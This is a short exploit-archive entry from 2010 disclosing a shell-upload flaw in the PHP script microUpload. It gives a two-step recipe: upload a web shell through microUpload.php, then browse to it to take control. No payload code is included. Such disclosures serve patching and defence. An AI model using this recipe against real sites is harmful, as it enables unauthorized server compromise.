id: 10917
date: 02/15/2010
title: microUpload Shell Upload Vulnerability
author: Phenom
cves: 

======================================
microUpload Shell Upload Vulnerability
======================================

#######   microUpload Upload Shell Vulnerability   #####################
#
#       Author : Phenom
#
#       app vendor : www.phptoys.com
#
#################################################################################
 
####### Exploit #################################################################
#
#     1- http://site.com/path/microUpload.php
#
#         upload your shell
#
#     2- http://site.com/path/yourshell.php
#
#         get your shell
#
#################################################################################



#  0day.today [2023-03-25]  #